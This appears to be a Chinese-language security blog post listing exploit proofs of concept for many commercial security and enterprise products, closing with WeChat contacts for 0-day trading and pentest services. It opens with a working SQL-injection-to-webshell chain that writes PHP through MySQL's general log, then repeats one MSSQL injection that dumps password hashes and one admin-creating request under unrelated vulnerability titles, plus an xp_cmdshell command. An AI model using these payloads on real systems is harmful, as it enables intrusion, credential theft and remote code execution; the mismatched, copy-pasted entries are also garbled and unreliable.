开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: 
http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}最后get请求rce:http://192.168.24.3:6868/check_login2.php9
HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --0马儿路径:/portal/ui/login/..;/..;/new.jsp
网神
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --1木马路径:attachements/xxx.php
网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --2汉德
汉得SRM tomcat.jsp 登录绕过漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --3然后访问后台:/main.screen
绿盟
绿盟sas安全审计系统任意文件读取漏洞
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --4绿盟 SAS堡垒机 Exec 远程命令执行漏洞
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --5任意用户登录-SAS堡垒机 local_user.php 任意用户登录漏洞
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --6安恒
安恒明御运维审计与风险控制系统堡垒机任意用户注册 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --7辰信景云
辰信景云终端安全管理系统 login SQL注入漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --8帆软
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --9蓝凌
OA前台代码执行 POC
GET/user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............HTTP/1.10
用友
用友移动管理系统 uploadApk.do 任意文件上传漏洞
GET/user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............HTTP/1.11
用友时空KSOA PayBill SQL注入漏洞
GET/user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............HTTP/1.12
exec master..xp_cmdshell 'whoami';
大华
大华智慧园区综合管理平台 searchJson SQL注入漏洞
GET/user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............HTTP/1.13
大华智慧园区综合管理平台 文件上传漏洞
GET/user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............HTTP/1.14
For 0-day/1-day vulnerability discussion, add Seven_-0928 or banxor9.
This lab accepts authorized penetration testing engagements for legitimate sites. If your company needs web penetration testing, advanced penetration testing, red/blue team exercises, attacker attribution, Java code audit and similar services, contact the following WeChat for business inquiries: Xud330327